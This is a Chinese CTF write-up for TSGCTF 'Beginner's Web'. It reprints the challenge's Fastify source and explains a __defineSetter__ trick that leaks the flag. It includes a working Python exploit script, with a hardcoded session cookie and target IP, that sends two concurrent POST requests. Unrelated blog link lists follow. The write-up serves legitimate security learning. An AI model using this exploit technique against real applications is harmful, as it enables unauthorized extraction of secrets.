const fastify = require('fastify');

 const nunjucks = require('nunjucks');

 const crypto = require('crypto');

 const converters = {};

 const flagConverter = (input, callback) => {

   const flag = '*** CENSORED ***';

   callback(null, flag);

 };

 const base64Converter = (input, callback) => {

   try {

     const result = Buffer.from(input).toString('base64');

     callback(null, result)

   } catch (error) {

     callback(error);

   }

 };

 const scryptConverter = (input, callback) => {

   crypto.scrypt(input, 'I like sugar', 64, (error, key) => {

     if (error) {

       callback(error);

     } else {

       callback(null, key.toString('hex'));

     }

   });

 };

 const app = fastify();

 app.register(require('point-of-view'), {engine: {nunjucks}});

 app.register(require('fastify-formbody'));

 app.register(require('fastify-cookie'));

 app.register(require('fastify-session'), {secret: Math.random().toString(2), cookie: {secure: false}});

 app.get('/', async (request, reply) => {

   reply.view('index.html', {sessionId: request.session.sessionId});

 });

 app.post('/', async (request, reply) => {

   if (request.body.converter.match(/[FLAG]/)) {

     throw new Error("Don't be evil :)");

   }

   if (request.body.input.length < 10) {

     throw new Error('Too short :(');

   }

   converters['base64'] = base64Converter;

   converters['scrypt'] = scryptConverter;

   converters[`FLAG_${request.session.sessionId}`] = flagConverter;

   const result = await new Promise((resolve, reject) => {

     converters[request.body.converter](request.body.input, (error, result) => {

       if (error) {

         reject(error);

       } else {

         resolve(result);

       }

     });

   });

   reply.view('index.html', {

     input: request.body.input,

     result,

     sessionId: request.session.sessionId,

   });

 });

 app.setErrorHandler((error, request, reply) => {

   reply.view('index.html', {error, sessionId: request.session.sessionId});

 });

 app.listen(59101, '0.0.0.0');

页面下方有显示出用户sessionID,结合源码不难看出可以利用flagConverter获得flag。因为有匹配,所以直接在converter参数传入FLAG_${request.session.sessionId}是行不通的。

1.利用__defineSetter__创造出名为FLAG_${request.session.sessionId}的数组键名 (${request.session.sessionId}表示sessionID)。

__defineSetter__介绍:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineSetter__

__defineSetter__有两个参数,第一个是属性,第二个是函数。实际上就是绑个函数在指定属性上,当指定属性被赋值时,该函数会被调用。

converters[request.body.converter](request.body.input, (error, result)是用户可控的,(error, result)是箭头函数有两个参数


所以,input输入FLAG_${request.session.sessionId},converter参数输入__defineSetter__就可以成功把(error, result)绑在FLAG_${request.session.sessionId}上。FLAG_${request.session.sessionId}对应箭头函数的第一个参数error,最后能通过error把flag输出


此时,我们需要对promise有所了解    https://blog.csdn.net/new__person/article/details/103702562




因为 __defineSetter__没有被触发,promise不会有返回结果,所以http没有response




此时应该是这样的__defineSetter(FLAG_${request.session.sessionId},(error, result) => {if (error) {reject(error);} else {resolve(result);})


我们直接回到post




红色箭头所指的是一个赋值操作,只要执行这条语句就能触发我们之前的__defineSetter__。非常的amazing啊,我们只要再发一个不会在前两个if判断挂掉的包就能成功触发。触发之后就会把FLAG_${request.session.sessionId}传入箭头函数,作为其第一个参数error,通过reject(error)输出。这里使用python发包


exp:




#!/usr/bin/python3

import threading

import requests

import time

cookie = {"sessionId" : "Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY.ZyckOkEpT1GboSRLgcE1I%2BZ52%2FqfSQEZWkq1%2F5dyJB"}

def sendPayload():

    r = requests.post("http://35.221.81.216:59101",data={"converter":"__defineSetter__","input":"FLAG_Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY"},cookies=cookie)

    print(r.text)

threading.Thread(target=sendPayload).start()

requests.post("http://35.221.81.216:59101",data={"converter":"base64","input":"55555555555555555555"},cookies=cookie)




这题叫beginner可真是太艹了
本人js菜的抠脚,如果有不对的地方,望各位师傅斧正
												


											
TSGCTF-web  Beginner's Web (js内置方法__defineSetter__)的更多相关文章
	

    
								
  1. web前端学习(四)JavaScript学习笔记部分(6)-- js内置对象
		
    1.JS内置对象-什么是对象 1.1.什么是对象: JavaScript中的所有事物都是对象:字符串.数值.数组.函数 每个对象带有属性和方法 JavaScript允许自定义对象 1.2.自定义对象: ...
    
		
    2. 
						
  2. 4、js内置函数
		
    前言:上一篇我介绍了函数的基本概念,和一些简单的Demo.其实很多函数是js内置的,我们无需自己去写,直接拿过来用即可.内置函数分为全局函数和js内置对象的函数区别:全局函数不属于任何一个内置对象.理 ...
    
		
    3. 
						
  3. 4月5日--课堂笔记--JS内置对象
		
    JavaScript 4.5 一.    JS内置对象 1.数组Array a)创建语法1:var arr=new Array(参数); i.       没有参数:创建一个初始容量为0的数组 ii. ...
    
		
    4. 
						
  4. JS内置对象有哪些?
		
    JS内置对象分为数据封装类对象和其他对象 数据封装类对象:String,Boolean,Number,Array,和Object; 其他对象:Function,Arguments,Math,Date, ...
    
		
    5. 
						
  5. JS内置对象-String对象、Date日期对象、Array数组对象、Math对象
		
    一.JavaScript中的所有事物都是对象:字符串.数组.数值.函数... 1.每个对象带有属性和方法 JavaScript允许自定义对象 2.自定义对象 a.定义并创建对象实例 b.使用函数来定义 ...
    
		
    6. 
						
  6. js  内置对象和方法  示例
		
    JS内置函数不从属于任何对象,在JS语句的任何地方都可以直接使用这些函数.JS中常用的内置函数如下: 1.eval(str)接收一个字符串形式的表达式,并试图求出表达式的值.作为参数的表达式可以采用任 ...
    
		
    7. 
						
  7. 【ES6】改变 JS 内置行为的代理与反射
		
    代理(Proxy)可以拦截并改变 JS 引擎的底层操作,如数据读取.属性定义.函数构造等一系列操作.ES6 通过对这些底层内置对象的代理陷阱和反射函数,让开发者能进一步接近 JS 引擎的能力. 一.代 ...
    
		
    8. 
						
  8. 5月15日上课笔记-js中 location对象的属性、document对象、js内置对象、Date事件对象、
		
    location的属性: host: 返回当前主机名和端口号 定时函数: setTimeout( ) setInterval() 二.document对象 getElementById(); 根据ID ...
    
		
    9. 
						
  9. JS内置对象的原型不能重定义?只能动态添加属性或方法?
		
    昨天马上就快下班了,坐在我对面的同事突然问我一个问题,我说“爱过”,哈哈,开个玩笑.情况是这样的,他发现JS的内置对象的原型好像不能通过字面量对象的形式进行覆盖, 只能动态的为内置对象的原型添加属性或 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. coderfoces#414 div.2
			
    第一次打cf 感觉很奇妙 开始看到题目感觉极其怪异 然后忽然发现第一题一堆数中的因数出现最多的不是2么 然后过了5分钟就被一个专门攻击的人hack掉了 不得不说题并不难甚至很水(都是几行的入门题) 但 ...
    
			
    2. 
						
  2. 入门大数据---基于Zookeeper搭建Spark高可用集群
			
    一.集群规划 这里搭建一个 3 节点的 Spark 集群,其中三台主机上均部署 Worker 服务.同时为了保证高可用,除了在 hadoop001 上部署主 Master 服务外,还在 hadoop0 ...
    
			
    3. 
						
  3. 【转】HBase的MapReduce调用
			
    参考: https://blog.csdn.net/u012848709/article/details/83744699 自己照着搭建了下,顺便把坑也踩了下,项目见云盘: 链接:https://pa ...
    
			
    4. 
						
  4. dart快速入门教程 (5)
			
    5.函数 5.1.函数定义 语法: 返回值类型 函数名(参数类型 参数1, 参数类型 参数2,...) { // 函数体 return '返回值' } 举例: void main() { print( ...
    
			
    5. 
						
  5. ajax前后端交互原理(7)
			
    7.ajax函数封装 7.1.实例引入 需求: 每秒钟请求一次服务器 获取到数据 实现: 把ajax进行封装 <!DOCTYPE html> <html> <head&g ...
    
			
    6. 
						
  6. 循序渐进VUE+Element 前端应用开发(14)--- 根据ABP后端接口实现前端界面展示
			
    在前面随笔<循序渐进VUE+Element 前端应用开发(12)--- 整合ABP框架的前端登录处理>简单的介绍了一个结合ABP后端的登陆接口实现前端系统登陆的功能,本篇随笔继续深化这一主 ...
    
			
    7. 
						
  7. 每日一题 - 剑指 Offer 48. 最长不含重复字符的子字符串
			
    题目信息 时间: 2019-07-02 题目链接:Leetcode tag: 动态规划 哈希表 难易程度:中等 题目描述: 请从字符串中找出一个最长的不包含重复字符的子字符串,计算该最长子字符串的长度 ...
    
			
    8. 
						
  8. 【.NET Core】在Win10中用VS Code debug
			
    虽然windows平台中有功能丰富且强大的Visual Studio,但有时也稍显臃肿,不如VS Code(vsc)小巧便捷,废话不多说,直接进入正题 前提 .NET Core RC2 X64系统 W ...
    
			
    9. 
						
  9. Django---进阶8
			
    目录 前后端传输数据的编码格式(contentType) ajax发送json格式数据 ajax发送文件 django自带的序列化组件(drf做铺垫) ajax结合sweetalert 批量插入 分页 ...
    
			
    10. 
						
  10. SpringCloud组件的停更和替换说明
			
    SpringCloud的Hoxton版本,和之前的版本相比,用新的组件替换掉了原来大部分的组件,老的组件现在处于 停更不停用 的状况. 详情见下图(× 的表示之前的组件,现在停更了的:√ 的表示新的替 ...
    
			
    11.